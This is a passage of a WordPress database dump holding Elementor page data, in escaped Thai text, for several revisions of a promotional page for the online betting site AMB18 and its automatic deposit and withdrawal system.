\\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e15\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e17\\u0e22\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30<\\/p><p data-start=\\\"2533\\\" data-end=\\\"2575\\\"><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u00a0<\\/strong><\\/span><b><u>AMB18<\\/u><\\/b><\\/p><ul><li data-start=\\\"2578\\\" data-end=\\\"2668\\\"><strong data-start=\\\"2578\\\" data-end=\\\"2617\\\">\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e17\\u0e38\\u0e01\\u0e41\\u0e2b\\u0e48\\u0e07<\\/strong> \\u0e40\\u0e0a\\u0e48\\u0e19 \\u0e01\\u0e2a\\u0e34\\u0e01\\u0e23\\u0e44\\u0e17\\u0e22, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e40\\u0e17\\u0e1e, \\u0e44\\u0e17\\u0e22\\u0e1e\\u0e32\\u0e13\\u0e34\\u0e0a\\u0e22\\u0e4c, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e28\\u0e23\\u0e35\\u0e2f \\u0e2f\\u0e25\\u0e2f<\\/li><li data-start=\\\"2671\\\" data-end=\\\"2753\\\"><strong data-start=\\\"2671\\\" data-end=\\\"2707\\\">\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a TrueMoney Wallet \\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/strong> \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23<\\/li><li data-start=\\\"2756\\\" data-end=\\\"2796\\\"><strong data-start=\\\"2756\\\" data-end=\\\"2794\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e08\\u0e31\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22 AI \\u0e2d\\u0e31\\u0e08\\u0e09\\u0e23\\u0e34\\u0e22\\u0e30<\\/strong><\\/li><li data-start=\\\"2799\\\" data-end=\\\"2866\\\"><strong data-start=\\\"2799\\\" data-end=\\\"2840\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14\\u0e41\\u0e1a\\u0e1a 2 \\u0e0a\\u0e31\\u0e49\\u0e19 (2FA)<\\/strong> \\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25<\\/li><li data-start=\\\"2869\\\" data-end=\\\"2919\\\"><strong data-start=\\\"2869\\\" data-end=\\\"2903\\\">\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e15\\u0e48\\u0e2d\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23<\\/strong> \\u0e17\\u0e31\\u0e49\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e25\\u0e30\\u0e16\\u0e2d\\u0e19<\\/li><\\/ul><blockquote><p style=\\\"text-align: center;\\\" data-start=\\\"2921\\\" data-end=\\\"3018\\\"><em><span style=\\\"color: #ffcc00;\\\"><b>\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49 AMB18 \\u0e08\\u0e36\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07 \\u201c\\u0e40\\u0e23\\u0e47\\u0e27\\u201d \\u0e41\\u0e25\\u0e30 \\u201c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u201d \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e35\\u0e49<\\/b><\\/span><\\/em><\\/p><\\/blockquote>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3003,400,'_thumbnail_id','345'),(3006,401,'_elementor_edit_mode','builder'),(3007,401,'_elementor_template_type','wp-page'),(3008,401,'_elementor_version','3.35.5'),(3009,401,'_elementor_pro_version','3.32.3'),(3010,401,'_wp_page_template','default'),(3011,401,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(3012,401,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0cb3fb0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19 <b>AMB18\\u00a0<\\/b>\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e33\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a \\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e17\\u0e33\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e2a\\u0e23\\u0e47\\u0e08\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e07\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e21\\u0e32\\u0e13\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e22\\u0e37\\u0e14\\u0e2b\\u0e22\\u0e38\\u0e48\\u0e19 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e44\\u0e23\\u0e01\\u0e47\\u0e15\\u0e32\\u0e21\\u0e04\\u0e27\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e2a\\u0e15\\u0e34 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11898c9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/3icon-AMB18.webp\",\"id\":345,\"size\":\"\",\"alt\":\"\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1741422\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e33\\u0e44\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c AMB18 \\u0e16\\u0e36\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9b3a68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"2289\\\" data-end=\\\"2531\\\">\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49 <b>AMB18\\u00a0<\\/b>\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19 \\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 <strong data-start=\\\"2353\\\" data-end=\\\"2380\\\">Auto Transaction System<\\/strong> \\u0e17\\u0e35\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e08\\u0e32\\u0e01 USA \\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e15\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e17\\u0e22\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30<\\/p><p data-start=\\\"2533\\\" data-end=\\\"2575\\\"><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u00a0<\\/strong><\\/span><b><u>AMB18<\\/u><\\/b><\\/p><ul><li data-start=\\\"2578\\\" data-end=\\\"2668\\\"><strong data-start=\\\"2578\\\" data-end=\\\"2617\\\">\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e17\\u0e38\\u0e01\\u0e41\\u0e2b\\u0e48\\u0e07<\\/strong> \\u0e40\\u0e0a\\u0e48\\u0e19 \\u0e01\\u0e2a\\u0e34\\u0e01\\u0e23\\u0e44\\u0e17\\u0e22, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e40\\u0e17\\u0e1e, \\u0e44\\u0e17\\u0e22\\u0e1e\\u0e32\\u0e13\\u0e34\\u0e0a\\u0e22\\u0e4c, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e28\\u0e23\\u0e35\\u0e2f \\u0e2f\\u0e25\\u0e2f<\\/li><li data-start=\\\"2671\\\" data-end=\\\"2753\\\"><strong data-start=\\\"2671\\\" data-end=\\\"2707\\\">\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a TrueMoney Wallet \\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/strong> \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23<\\/li><li data-start=\\\"2756\\\" data-end=\\\"2796\\\"><strong data-start=\\\"2756\\\" data-end=\\\"2794\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e08\\u0e31\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22 AI \\u0e2d\\u0e31\\u0e08\\u0e09\\u0e23\\u0e34\\u0e22\\u0e30<\\/strong><\\/li><li data-start=\\\"2799\\\" data-end=\\\"2866\\\"><strong data-start=\\\"2799\\\" data-end=\\\"2840\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14\\u0e41\\u0e1a\\u0e1a 2 \\u0e0a\\u0e31\\u0e49\\u0e19 (2FA)<\\/strong> \\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25<\\/li><li data-start=\\\"2869\\\" data-end=\\\"2919\\\"><strong data-start=\\\"2869\\\" data-end=\\\"2903\\\">\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e15\\u0e48\\u0e2d\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23<\\/strong> \\u0e17\\u0e31\\u0e49\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e25\\u0e30\\u0e16\\u0e2d\\u0e19<\\/li><\\/ul><blockquote><p style=\\\"text-align: center;\\\" data-start=\\\"2921\\\" data-end=\\\"3018\\\"><em><span style=\\\"color: #ffcc00;\\\"><b>\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49 AMB18 \\u0e08\\u0e36\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07 \\u201c\\u0e40\\u0e23\\u0e47\\u0e27\\u201d \\u0e41\\u0e25\\u0e30 \\u201c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u201d \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e35\\u0e49<\\/b><\\/span><\\/em><\\/p><\\/blockquote>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3013,401,'_thumbnail_id','345'),(3016,402,'_elementor_edit_mode','builder'),(3017,402,'_elementor_template_type','wp-page'),(3018,402,'_elementor_version','3.35.5'),(3019,402,'_elementor_pro_version','3.32.3'),(3020,402,'_wp_page_template','default'),(3021,402,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(3022,402,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0cb3fb0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-pm-slice=\\\"0 0 []\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19 AMB18 \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e2a\\u0e38\\u0e14\\u0e25\\u0e49\\u0e33\\u0e14\\u0e35\\u0e44\\u0e0b\\u0e19\\u0e4c\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e44\\u0e27\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e17\\u0e33\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e41\\u0e04\\u0e48\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e04\\u0e25\\u0e34\\u0e01\\u0e01\\u0e47\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e23\\u0e49\\u0e2d\\u0e22 